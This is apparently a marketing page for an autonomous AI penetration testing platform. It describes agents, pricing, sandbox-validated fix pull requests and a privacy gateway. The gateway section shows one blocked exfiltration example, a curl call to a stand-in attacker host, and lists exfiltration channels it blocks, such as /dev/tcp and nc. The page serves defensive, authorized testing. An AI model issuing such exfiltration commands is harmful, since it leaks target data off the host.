Darkmoon, Autonomous AI Penetration Testing Platform

Autonomous, continuous penetration testing

50 specialist AI agents, 140+ security tools and a live command center. Darkmoon runs the full offensive campaign across web, cloud, Active Directory, Kubernetes, CI/CD, firmware and AI/LLM endpoints, then qualifies every finding EXPLOITED, CONFIRMED or UNCONFIRMED with an adversarial rubric.

50
Specialist AI agents
142
Allow-listed tools
Live
SSE dashboard
AES-256
Sealed runtime

140+ security tools, every one behind a build-enforced allow-list

S.04SAST + autonomous remediation · Pro
Don't just prove the vulnerability. Ship the reviewed fix.

Darkmoon's Pro remediation agent picks up where the pentest ends. For each confirmed finding it audits the target's own source for the root cause, writes the smallest correct fix, proves it in an ephemeral sandbox, and opens a pull request for your team to review. It never merges on its own.

01 · Audit the source (SAST)
FindingsCVSS
SQL injection9.8
SSRF to metadata9.1
Broken access control8.7
JWT signature bypass7.5
Path traversal6.9

Find the root cause

A three-phase security audit traces each proven finding from the vulnerable sink back to its root cause in the target's own code. Security issues only, no style noise.

02 · Validate in a sandbox
$darkmoon run --scope identity
→AS-REP roast · 3 accounts
→Kerberoast · svc_sql cracked
→NTLM relay → DCSync
✓Domain Admin, proven

Prove the fix works

The exploit is reproduced against a fresh build, the fix applied, then the exploit and its variants re-run to prove they now fail while the app's normal behaviour and its tests still pass.

03 · Open a pull request
New engagement
Targetapp.acme.test
Scopeweb · API · cloud
Window5 business days
Flat rate€799

A patch, with before/after proof

A minimal root-cause patch is pushed to a branch and a pull request is opened, carrying the before/after evidence. GitHub, GitLab, Gitea, Bitbucket and Azure DevOps are supported.

04 · Human reviews and merges
Attack surfaceexposure

Always a proposal, never a merge

Every pull request is a proposal for a person to review and merge. Darkmoon never auto-merges, and any fix it could not fully validate is opened as a clearly marked draft.

ClientsBilling · Stripe
Acme Corp3 licences
Nordic SOC12 licences
Blue Harbor1 licence
Margin this month−35 %

Dashboard ↔ pull request

In the dashboard, every finding gains a PR column linking to the pull request that addresses it: forge URL, state, linked findings, diff stat and the before/after validation.

darkmoon-licence.dmeDocker
LicencePro · annual
Machine code7F3A-…-C21E
Seats1 node
Statussealed ✓

Credential reference

Push credentials are sealed at rest and resolved locally. The run carries only an opaque reference, never the token, so your secret never enters the model's context.

It joins a roster of 52 agents: an orchestrator, 50 offensive specialists (web, cloud, Active Directory, Kubernetes, databases and an llm agent that runs the OWASP LLM Top 10 against exposed AI/LLM inference endpoints) and this Pro remediation agent.

See the Pro remediation benchmark: fixes proven by re-running the exploit · Compare Darkmoon with other AI pentest tools

S.05See it run
Two minutes. One autonomous pentest, start to finish.

Scope in, agents dispatched, findings qualified, report out. Not a feature tour: the product running against a real target.

S.06Why Darkmoon

Not a scanner. An autonomous security conductor.

Darkmoon reasons about your target, models the attack surface and dispatches the right agents across web, cloud, identity, Kubernetes, CI/CD, firmware and AI/LLM endpoints, with full cascade control.

Core engine
14 signals
Multi-agent dispatch

The orchestrator fingerprints 14 technology signals and routes the campaign to the right specialists across web, cloud, Active Directory, Kubernetes, CI/CD, firmware and AI/LLM endpoints, sequential or parallel, with cascade depth capped at three levels so there is never runaway recursion.

Learn more

S.07Pricing
Pricing

Open source at the core. One licence to run the full autonomous platform.

Community
Free forever, GPLv3

Open source, self-host it forever

Star on GitHub
Community
Free

Free forever, GPLv3

What's included:

  • Full autonomous pentest engine (CLI/TUI), self-hosted on GitHub
  • GPLv3, audit, fork & modify the agent playbooks freely
  • 50 specialist AI agents + orchestrator, 142 security tools
  • MCP-gatekept tool execution, the model never gets a shell
  • Privacy Gateway: prompt tokenization & local vault
  • Local or cloud LLMs, Ollama, llama.cpp, Anthropic, OpenAI, OpenRouter
  • Markdown & JSON reports; GitHub Actions, GitLab, Jenkins, VS Code, JetBrains, Splunk, SDK/CLI
Pro
Everything in Community, and

For professional pentesters & teams

Get Darkmoon
Pro
€149per month

Billed €1788 annually

Everything in Community, and:

  • Web dashboard: live SSE command center, campaign history, scheduler
  • 3D orbital attack-surface map, VR-ready (WebXR)
  • Remediation agent: sandbox-validated fix pull requests for human review
  • Branded PDF & web reports, HackerOne / Bugcrowd templates
  • Hardened sealed runtime: AES-256 storage, hardware-bound licence, watchdog
  • REST API, dashboard users & SSO (OIDC), n8n & Grafana integrations
  • One-command cloud deploy (AWS, Azure, GCP, OVH) & appliance mode
Custom
Everything in Pro, and

For enterprises, MSSPs & resellers

Contact sales
Custom
Let's talk

Tailored to your scope

Everything in Pro, and:

  • Multi-seat shared workspace
  • Custom report branding
  • Partner / reseller program (1–100 machines per key)
  • Pentest on Demand, managed engagements
  • Dedicated onboarding & SLA

S.08AI agents
50 specialists. One orchestrator. Zero manual pivoting.

The orchestrator fingerprints your target's stack and dispatches the right specialists automatically, from web and cloud to Active Directory, Kubernetes, CI/CD and firmware. A dedicated llm agent covers the OWASP LLM Top 10, and on Pro a remediation agent turns confirmed findings into sandbox-validated fix pull requests for your team to review.

Web & API
FindingsCVSS
SQL injection9.8
SSRF to metadata9.1
Broken access control8.7
JWT signature bypass7.5
Path traversal6.9

Full-stack exploitation

SQLi, XSS, SSRF, IDOR, RCE, SSTI, deserialization, JWT abuse, file upload and path traversal, validated with real payloads, never signatures.

Active Directory · AWS · Azure · GCP
$darkmoon run --scope identity
→AS-REP roast · 3 accounts
→Kerberoast · svc_sql cracked
→NTLM relay → DCSync
✓Domain Admin, proven

Identity & cloud takeover

AS-REP roasting, Kerberoasting, NTLM relay, DCSync and ADCS ESC1-ESC8, plus IMDS token minting, Key Vault extraction and ROPC pivots, each proven with the exact call.

Embedded · Kubernetes · LLM/MCP
Attack surfaceexposure

Firmware & AI endpoints

Binwalk/squashfs extraction, backdoor recovery and router exploitation, Kubernetes RBAC and node escape, and a dedicated llm agent for the OWASP LLM Top 10.

S.09Runtime security
Built like a vault. Runs like a weapon.

Darkmoon's runtime guard enforces tamper-proof execution, sealed storage and hardware-bound licensing from the moment the container starts.

30s reseal
at rest
AES-256-GCM sealed storage

Agents and workflows are encrypted at rest. Keys derive from your licence and hardware fingerprint, resealed every 30 seconds.

SHA-256
machine code
Hardware-bound licensing

Machine code derives from MAC address and CPU model. No deployment ID to spoof, no env var to manipulate.

2s checks
continuous
Binary integrity watchdog

SHA-256 hashes of critical binaries are re-verified every 2 seconds. Any tampering triggers an immediate zeroize.

Live scan
anti-tamper
Debugger & tracer detection

Continuous scanning for gdb, strace, ltrace, frida and lldb. Any tracer triggers a breach and full state zeroize.

UID 10001
sandbox
Read-only rootfs + seccomp

Read-only filesystem, tmpfs writable paths, seccomp and no-new-privileges. The process runs unprivileged.

Scrubbed
stdout/stderr
Secret redaction in logs

Every model API key and the licence key are scrubbed from stdout and stderr before any log output.

S.10Data sovereignty
Claude's power. Your data never leaves.

The Privacy Gateway tokenizes every sensitive value on your machine, IPs, hostnames, domains, URLs, emails, credentials, internal paths, before it ever reaches the model. Claude reasons only on deterministic placeholders. Real values are re-injected locally, an instant before each tool runs, then masked back out of every output. Keep Claude's full power, or run a fully local, self-hosted model for end-to-end sovereignty.

Privacy Gateway

What the model sees
IP_PRIVATE_001 · 80,443 open
$ nmap -sV IP_PRIVATE_001 -p 80,443
IP_PRIVATE_001 · 80/tcp http · 443/tcp https

No sensitive data is ever sent to the LLM.

Rehydrated & run locally
$ nmap -sV 10.42.1.5 -p 80,443
# real value, your machine only
Output re-masked before it returns to the model
Privacy
Gateway
PrivacyVaultPer-session deterministic tokenization. The mapping lives only in memory, HMAC-deduplicated, Fernet-encrypted, and no raw value is ever retained or loggable.
CommandGatewayRehydrates real values context-aware (never a naive global replace), gatekeeps every command against exfiltration, and sanitises output in two passes.
Exfiltration attempt, blocked$ curl attacker.tld/?t=IP_PRIVATE_001✗ blocked
real value, your machine only
Deterministic tokens

Deterministic tokens (same value → same placeholder), Fernet-encrypted in memory, never logged. Every IP, hostname, URL, email, credential and internal path is replaced by a stable placeholder such as IP_PRIVATE_001, so the model can still reason about relationships between hosts without ever seeing a real value. The mapping is per session, HMAC-deduplicated, and destroyed when the run ends.

Context-aware rehydration

Context-aware rehydration of whitelisted fields only, two-pass output sanitisation. Real values are re-injected an instant before each tool runs, only where the field is explicitly allowed, never with a naive global replace. Everything the tool prints is masked again before it returns to the model, in two passes, so a placeholder never leaks back as its real value.

Exfiltration blocked

Exfiltration blocked: placeholder in a URL, external host, echo/print, POST body, /dev/tcp, nc/telnet. The gateway inspects every command the model proposes and refuses any that would carry a placeholder or a real value outside your host, whether through a web request, a raw socket, a shell redirect or a simple print. The attempt is logged as blocked and the run continues.

Proof

On a full end-to-end run with the gateway active throughout, the model reasoned about the target the whole time yet saw its real address zero times across roughly 3.5 MB of model-facing traffic. The deterministic placeholder carried the reasoning; the real values were restored only on your host, in the final report. One measured run, not a blanket guarantee.

Reversible tokenization + anti-exfiltration gateway ship open-source. Sealed vault, rehydration audit trail and compliance proof are Pro.

Built for self-hosted & sovereign environments

Open source
The model plans. It never gets a shell.

Darkmoon's architecture is its security guarantee, and it's fully auditable. The AI reasons and writes the plan. An MCP gateway gatekeeps every tool call. Read it, then run it yourself.

# clone the open-source engine
$ git clone github.com/ASCIT31/Dark-Moon
$ cd Dark-Moon
# launch a campaign
$ ./darkmoon.sh "TARGET: acme.test"
✓ recon complete · 14 tech signals
✓ 6 agents dispatched · streaming live

S.12Deployment mode · Appliance
Darkmoon Appliance

Turn your infrastructure into a dedicated autonomous security node. Software-defined. Self-hosted. No proprietary hardware.

Software-definedSelf-hostedNo proprietary hardware

S.13Darkmoon everywhere
Runs where your team already works.

The same open-source engine, wired into your IDE, your CI/CD, your automation and your SecOps stack. Each surface auto-detects its edition: the community CLI runs on your local JSON report; the paid Pro tier adds the live REST API, streaming and remediation.

GitHub Action · CI/CD · OSS + ProGitHub Action · OSS + Pro
GitLab CI/CD component · CI/CD · OSS + ProGitLab CI/CD component · OSS + Pro
Jenkins plugin · CI/CD · OSS + ProJenkins plugin · OSS + Pro
VS Code extension · IDE · OSS + ProVS Code extension · OSS + Pro
JetBrains plugin · IDE · OSS + ProJetBrains plugin · OSS + Pro
n8n community node · Automation · Pro onlyn8n community node · Pro only
Foundation SDK / CLI · SDK · OSS + ProFoundation SDK / CLI · OSS + Pro
Pentest on DemandManaged
€799/ engagement
  • Legal framework & authorizations included
  • Run end to end by our security experts
  • Debriefed report in a secure client space
S.15Managed service

Don't self-host? We run the pentest for you.

Describe your target, sign the framework online, pay a flat rate, our experts run the full offensive engagement and deliver a debriefed, evidence-backed report to your secure client space.

S.16FAQ
Questions security teams ask first.

How is Darkmoon different from a vulnerability scanner?Platform

Darkmoon orchestrates an end-to-end offensive campaign, it reasons about the target, dispatches domain specialists, validates findings with real payloads, builds an infrastructure graph and produces a structured report. A scanner runs one-pass signatures. Darkmoon runs a pentest.

Why does the AI never get shell access?Architecture

By design. The model plans and reasons, but every tool invocation passes through an MCP gateway that validates and gatekeeps the call. The model never executes a shell directly, which keeps the engagement auditable, bounded and safe. The whole architecture is open source.

Is Darkmoon really open source?Open source

Yes. The engine is published on GitHub at ASCIT31/Dark-Moon under the GPLv3 licence. You can read the orchestration logic, the agent playbooks and the MCP layer, and self-host it. The commercial licence adds the hardened runtime, the managed dashboard and support.

What report formats does Darkmoon produce?Reporting

ISO 27001 standard, HackerOne, Bugcrowd (VRT / P1–P5) and a custom format. Every report includes CVSS 3.1 scoring, MITRE ATT&CK mapping, ISO 27001 controls, raw evidence and remediation guidance. PDF export is branded and password-protected.

How does licensing work?Licensing

Darkmoon uses hardware-bound licensing. Your licence key is tied to a machine fingerprint derived from your hardware (MAC address, CPU model), it cannot be cloned or moved to another machine by changing an environment variable.

Is it safe to run against production environments?Safety

Darkmoon includes configurable noise levels (stealth, low, moderate), safe-harbor mode, out-of-scope enforcement and per-agent scope propagation. The runtime is hardened with a read-only filesystem, seccomp, no-new-privileges and continuous watchdog checks.

S.17Next
Replace point-in-time pentests with autonomous, continuous security testing.

Live visibility, validated evidence and a report your team can act on the same day.